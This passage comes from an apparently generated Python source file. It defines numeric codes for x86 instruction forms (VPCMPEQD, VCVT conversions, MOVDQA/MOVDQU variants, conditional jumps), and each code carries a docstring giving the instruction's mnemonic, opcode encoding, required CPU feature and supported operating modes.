``VEX.256.66.0F.WIG 76 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_XMM_XMMM128B32: int = 1732
"""
``VPCMPEQD k1 {k2}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_YMM_YMMM256B32: int = 1733
"""
``VPCMPEQD k1 {k2}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQD_KR_K1_ZMM_ZMMM512B32: int = 1734
"""
``VPCMPEQD k1 {k2}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EMMS: int = 1735
"""
``EMMS``
``NP 0F 77``
``MMX``
``16/32/64-bit``
"""
VEX_VZEROUPPER: int = 1736
"""
``VZEROUPPER``
``VEX.128.0F.WIG 77``
``AVX``
``16/32/64-bit``
"""
VEX_VZEROALL: int = 1737
"""
``VZEROALL``
``VEX.256.0F.WIG 77``
``AVX``
``16/32/64-bit``
"""
VMREAD_RM32_R32: int = 1738
"""
``VMREAD r/m32, r32``
``NP 0F 78 /r``
``VMX``
``16/32-bit``
"""
VMREAD_RM64_R64: int = 1739
"""
``VMREAD r/m64, r64``
``NP 0F 78 /r``
``VMX``
``64-bit``
"""
EVEX_VCVTTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1740
"""
``VCVTTPS2UDQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1741
"""
``VCVTTPS2UDQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UDQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1742
"""
``VCVTTPS2UDQ zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1743
"""
``VCVTTPD2UDQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1744
"""
``VCVTTPD2UDQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 78 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UDQ_YMM_K1Z_ZMMM512B64_SAE: int = 1745
"""
``VCVTTPD2UDQ ymm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.0F.W1 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EXTRQ_XMM_IMM8_IMM8: int = 1746
"""
``EXTRQ xmm1, imm8, imm8``
``66 0F 78 /0 ib ib``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1747
"""
``VCVTTPS2UQQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1748
"""
``VCVTTPS2UQQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2UQQ_ZMM_K1Z_YMMM256B32_SAE: int = 1749
"""
``VCVTTPS2UQQ zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.66.0F.W0 78 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1750
"""
``VCVTTPD2UQQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1751
"""
``VCVTTPD2UQQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 78 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2UQQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1752
"""
``VCVTTPD2UQQ zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 78 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTSS2USI_R32_XMMM32_SAE: int = 1753
"""
``VCVTTSS2USI r32, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSS2USI_R64_XMMM32_SAE: int = 1754
"""
``VCVTTSS2USI r64, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W1 78 /r``
``AVX512F``
``64-bit``
"""
INSERTQ_XMM_XMM_IMM8_IMM8: int = 1755
"""
``INSERTQ xmm1, xmm2, imm8, imm8``
``F2 0F 78 /r ib ib``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTTSD2USI_R32_XMMM64_SAE: int = 1756
"""
``VCVTTSD2USI r32, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W0 78 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSD2USI_R64_XMMM64_SAE: int = 1757
"""
``VCVTTSD2USI r64, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W1 78 /r``
``AVX512F``
``64-bit``
"""
VMWRITE_R32_RM32: int = 1758
"""
``VMWRITE r32, r/m32``
``NP 0F 79 /r``
``VMX``
``16/32-bit``
"""
VMWRITE_R64_RM64: int = 1759
"""
``VMWRITE r64, r/m64``
``NP 0F 79 /r``
``VMX``
``64-bit``
"""
EVEX_VCVTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1760
"""
``VCVTPS2UDQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1761
"""
``VCVTPS2UDQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2UDQ_ZMM_K1Z_ZMMM512B32_ER: int = 1762
"""
``VCVTPS2UDQ zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1763
"""
``VCVTPD2UDQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1764
"""
``VCVTPD2UDQ xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 79 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2UDQ_YMM_K1Z_ZMMM512B64_ER: int = 1765
"""
``VCVTPD2UDQ ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.0F.W1 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EXTRQ_XMM_XMM: int = 1766
"""
``EXTRQ xmm1, xmm2``
``66 0F 79 /r``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1767
"""
``VCVTPS2UQQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1768
"""
``VCVTPS2UQQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2UQQ_ZMM_K1Z_YMMM256B32_ER: int = 1769
"""
``VCVTPS2UQQ zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.66.0F.W0 79 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1770
"""
``VCVTPD2UQQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1771
"""
``VCVTPD2UQQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 79 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2UQQ_ZMM_K1Z_ZMMM512B64_ER: int = 1772
"""
``VCVTPD2UQQ zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 79 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTSS2USI_R32_XMMM32_ER: int = 1773
"""
``VCVTSS2USI r32, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSS2USI_R64_XMMM32_ER: int = 1774
"""
``VCVTSS2USI r64, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W1 79 /r``
``AVX512F``
``64-bit``
"""
INSERTQ_XMM_XMM: int = 1775
"""
``INSERTQ xmm1, xmm2``
``F2 0F 79 /r``
``SSE4A``
``16/32/64-bit``
"""
EVEX_VCVTSD2USI_R32_XMMM64_ER: int = 1776
"""
``VCVTSD2USI r32, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W0 79 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSD2USI_R64_XMMM64_ER: int = 1777
"""
``VCVTSD2USI r64, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W1 79 /r``
``AVX512F``
``64-bit``
"""
EVEX_VCVTTPS2QQ_XMM_K1Z_XMMM64B32: int = 1778
"""
``VCVTTPS2QQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2QQ_YMM_K1Z_XMMM128B32: int = 1779
"""
``VCVTTPS2QQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPS2QQ_ZMM_K1Z_YMMM256B32_SAE: int = 1780
"""
``VCVTTPS2QQ zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.66.0F.W0 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_XMM_K1Z_XMMM128B64: int = 1781
"""
``VCVTTPD2QQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_YMM_K1Z_YMMM256B64: int = 1782
"""
``VCVTTPD2QQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTTPD2QQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1783
"""
``VCVTTPD2QQ zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_XMM_K1Z_XMMM64B32: int = 1784
"""
``VCVTUDQ2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.F3.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_YMM_K1Z_XMMM128B32: int = 1785
"""
``VCVTUDQ2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.F3.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 1786
"""
``VCVTUDQ2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.F3.0F.W0 7A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_XMM_K1Z_XMMM128B64: int = 1787
"""
``VCVTUQQ2PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F3.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_YMM_K1Z_YMMM256B64: int = 1788
"""
``VCVTUQQ2PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F3.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 1789
"""
``VCVTUQQ2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F3.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_XMM_K1Z_XMMM128B32: int = 1790
"""
``VCVTUDQ2PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F2.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_YMM_K1Z_YMMM256B32: int = 1791
"""
``VCVTUDQ2PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F2.0F.W0 7A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1792
"""
``VCVTUDQ2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.F2.0F.W0 7A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_XMM_K1Z_XMMM128B64: int = 1793
"""
``VCVTUQQ2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_XMM_K1Z_YMMM256B64: int = 1794
"""
``VCVTUQQ2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.0F.W1 7A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1795
"""
``VCVTUQQ2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.0F.W1 7A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_XMM_K1Z_XMMM64B32: int = 1796
"""
``VCVTPS2QQ xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.66.0F.W0 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_YMM_K1Z_XMMM128B32: int = 1797
"""
``VCVTPS2QQ ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.66.0F.W0 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPS2QQ_ZMM_K1Z_YMMM256B32_ER: int = 1798
"""
``VCVTPS2QQ zmm1 {k1}{z}, ymm2/m256/m32bcst{er}``
``EVEX.512.66.0F.W0 7B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_XMM_K1Z_XMMM128B64: int = 1799
"""
``VCVTPD2QQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_YMM_K1Z_YMMM256B64: int = 1800
"""
``VCVTPD2QQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 7B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTPD2QQ_ZMM_K1Z_ZMMM512B64_ER: int = 1801
"""
``VCVTPD2QQ zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 7B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SS_XMM_XMM_RM32_ER: int = 1802
"""
``VCVTUSI2SS xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.0F.W0 7B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SS_XMM_XMM_RM64_ER: int = 1803
"""
``VCVTUSI2SS xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.0F.W1 7B /r``
``AVX512F``
``64-bit``
"""
EVEX_VCVTUSI2SD_XMM_XMM_RM32_ER: int = 1804
"""
``VCVTUSI2SD xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F2.0F.W0 7B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SD_XMM_XMM_RM64_ER: int = 1805
"""
``VCVTUSI2SD xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F2.0F.W1 7B /r``
``AVX512F``
``64-bit``
"""
HADDPD_XMM_XMMM128: int = 1806
"""
``HADDPD xmm1, xmm2/m128``
``66 0F 7C /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHADDPD_XMM_XMM_XMMM128: int = 1807
"""
``VHADDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHADDPD_YMM_YMM_YMMM256: int = 1808
"""
``VHADDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
HADDPS_XMM_XMMM128: int = 1809
"""
``HADDPS xmm1, xmm2/m128``
``F2 0F 7C /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHADDPS_XMM_XMM_XMMM128: int = 1810
"""
``VHADDPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHADDPS_YMM_YMM_YMMM256: int = 1811
"""
``VHADDPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG 7C /r``
``AVX``
``16/32/64-bit``
"""
HSUBPD_XMM_XMMM128: int = 1812
"""
``HSUBPD xmm1, xmm2/m128``
``66 0F 7D /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHSUBPD_XMM_XMM_XMMM128: int = 1813
"""
``VHSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHSUBPD_YMM_YMM_YMMM256: int = 1814
"""
``VHSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
HSUBPS_XMM_XMMM128: int = 1815
"""
``HSUBPS xmm1, xmm2/m128``
``F2 0F 7D /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VHSUBPS_XMM_XMM_XMMM128: int = 1816
"""
``VHSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VHSUBPS_YMM_YMM_YMMM256: int = 1817
"""
``VHSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG 7D /r``
``AVX``
``16/32/64-bit``
"""
MOVD_RM32_MM: int = 1818
"""
``MOVD r/m32, mm``
``NP 0F 7E /r``
``MMX``
``16/32/64-bit``
"""
MOVQ_RM64_MM: int = 1819
"""
``MOVQ r/m64, mm``
``NP o64 0F 7E /r``
``MMX``
``64-bit``
"""
MOVD_RM32_XMM: int = 1820
"""
``MOVD r/m32, xmm``
``66 0F 7E /r``
``SSE2``
``16/32/64-bit``
"""
MOVQ_RM64_XMM: int = 1821
"""
``MOVQ r/m64, xmm``
``66 o64 0F 7E /r``
``SSE2``
``64-bit``
"""
VEX_VMOVD_RM32_XMM: int = 1822
"""
``VMOVD r/m32, xmm1``
``VEX.128.66.0F.W0 7E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVQ_RM64_XMM: int = 1823
"""
``VMOVQ r/m64, xmm1``
``VEX.128.66.0F.W1 7E /r``
``AVX``
``64-bit``
"""
EVEX_VMOVD_RM32_XMM: int = 1824
"""
``VMOVD r/m32, xmm1``
``EVEX.128.66.0F.W0 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVQ_RM64_XMM: int = 1825
"""
``VMOVQ r/m64, xmm1``
``EVEX.128.66.0F.W1 7E /r``
``AVX512F``
``64-bit``
"""
MOVQ_XMM_XMMM64: int = 1826
"""
``MOVQ xmm1, xmm2/m64``
``F3 0F 7E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVQ_XMM_XMMM64: int = 1827
"""
``VMOVQ xmm1, xmm2/m64``
``VEX.128.F3.0F.WIG 7E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMM_XMMM64: int = 1828
"""
``VMOVQ xmm1, xmm2/m64``
``EVEX.128.F3.0F.W1 7E /r``
``AVX512F``
``16/32/64-bit``
"""
MOVQ_MMM64_MM: int = 1829
"""
``MOVQ mm/m64, mm``
``NP 0F 7F /r``
``MMX``
``16/32/64-bit``
"""
MOVDQA_XMMM128_XMM: int = 1830
"""
``MOVDQA xmm2/m128, xmm1``
``66 0F 7F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQA_XMMM128_XMM: int = 1831
"""
``VMOVDQA xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQA_YMMM256_YMM: int = 1832
"""
``VMOVDQA ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_XMMM128_K1Z_XMM: int = 1833
"""
``VMOVDQA32 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_YMMM256_K1Z_YMM: int = 1834
"""
``VMOVDQA32 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_ZMMM512_K1Z_ZMM: int = 1835
"""
``VMOVDQA32 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_XMMM128_K1Z_XMM: int = 1836
"""
``VMOVDQA64 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_YMMM256_K1Z_YMM: int = 1837
"""
``VMOVDQA64 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_ZMMM512_K1Z_ZMM: int = 1838
"""
``VMOVDQA64 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDQU_XMMM128_XMM: int = 1839
"""
``MOVDQU xmm2/m128, xmm1``
``F3 0F 7F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQU_XMMM128_XMM: int = 1840
"""
``VMOVDQU xmm2/m128, xmm1``
``VEX.128.F3.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQU_YMMM256_YMM: int = 1841
"""
``VMOVDQU ymm2/m256, ymm1``
``VEX.256.F3.0F.WIG 7F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_XMMM128_K1Z_XMM: int = 1842
"""
``VMOVDQU32 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F3.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_YMMM256_K1Z_YMM: int = 1843
"""
``VMOVDQU32 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F3.0F.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_ZMMM512_K1Z_ZMM: int = 1844
"""
``VMOVDQU32 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F3.0F.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_XMMM128_K1Z_XMM: int = 1845
"""
``VMOVDQU64 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F3.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_YMMM256_K1Z_YMM: int = 1846
"""
``VMOVDQU64 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F3.0F.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_ZMMM512_K1Z_ZMM: int = 1847
"""
``VMOVDQU64 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F3.0F.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_XMMM128_K1Z_XMM: int = 1848
"""
``VMOVDQU8 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F2.0F.W0 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_YMMM256_K1Z_YMM: int = 1849
"""
``VMOVDQU8 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F2.0F.W0 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_ZMMM512_K1Z_ZMM: int = 1850
"""
``VMOVDQU8 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F2.0F.W0 7F /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_XMMM128_K1Z_XMM: int = 1851
"""
``VMOVDQU16 xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.F2.0F.W1 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_YMMM256_K1Z_YMM: int = 1852
"""
``VMOVDQU16 ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.F2.0F.W1 7F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_ZMMM512_K1Z_ZMM: int = 1853
"""
``VMOVDQU16 zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.F2.0F.W1 7F /r``
``AVX512BW``
``16/32/64-bit``
"""
JO_REL16: int = 1854
"""
``JO rel16``
``o16 0F 80 cw``
``386+``
``16/32/64-bit``
"""
JO_REL32_32: int = 1855
"""
``JO rel32``
``o32 0F 80 cd``
``386+``
``16/32-bit``
"""
JO_REL32_64: int = 1856
"""
``JO rel32``
``o64 0F 80 cd``
``X64``
``64-bit``
"""
JNO_REL16: int = 1857
"""
``JNO rel16``
``o16 0F 81 cw``
``386+``
``16/32/64-bit``
"""
JNO_REL32_32: int = 1858
"""
``JNO rel32``
``o32 0F 81 cd``
``386+``
``16/32-bit``
"""
JNO_REL32_64: int = 1859
"""
``JNO rel32``
``o64 0F 81 cd``
``X64``
``64-bit``
"""
JB_REL16: int = 1860
"""
``JB rel16``
``o16 0F 82 cw``
``386+``
``16/32/64-bit``
"""
JB_REL32_32: int = 1861
"""
``JB rel32``
``o32 0F 82 cd``
``386+``
``16/32-bit``
"""
JB_REL32_64: int = 1862
"""
``JB rel32``
``o64 0F 82 cd``
``X64``
``64-bit``
"""
JAE_REL16: int = 1863
"""
``JAE rel16``
``o16 0F 83 cw``
``386+``
``16/32/64-bit``
"""
JAE_REL32_32: int = 1864
"""
``JAE rel32``
``o32 0F 83 cd``
``386+``
``16/32-bit``
"""
JAE_REL32_64: int = 1865
"""
``JAE rel32``
``o64 0F 83 cd``
``X64``
``64-bit``
"""
JE_REL16: int = 1866
"""
``JE rel16``
``o16 0F 84 cw``
``386+``
``16/32/64-bit``
"""
JE_REL32_32: int = 1867
"""
``JE rel32``
``o32 0F 84 cd``
``386+``
``16/32-bit``
"""
JE_REL32_64: int = 1868
"""
``JE rel32``
``o64 0F 84 cd``
``X64``
``64-bit``
"""
JNE_REL16: int = 1869
"""
``JNE rel16``
``o16 0F 85 cw``
``386+``
``16/32/64-bit``
"""
JNE_REL32_32: int = 1870
"""
``JNE rel32``
``o32 0F 85 cd``
``386+``
``16/32-bit``
"""
JNE_REL32_64: int = 1871
"""
``JNE rel32``
``o64 0F 85 cd``
``X64``
``64-bit``
"""
JBE_REL16: int = 1872
"""
``JBE rel16``
``o16 0F 86 cw``
``386+``
``16/32/64-bit``
"""
JBE_REL32_32: int = 1873
"""
``JBE rel32``
``o32 0F 86 cd``
``386+``
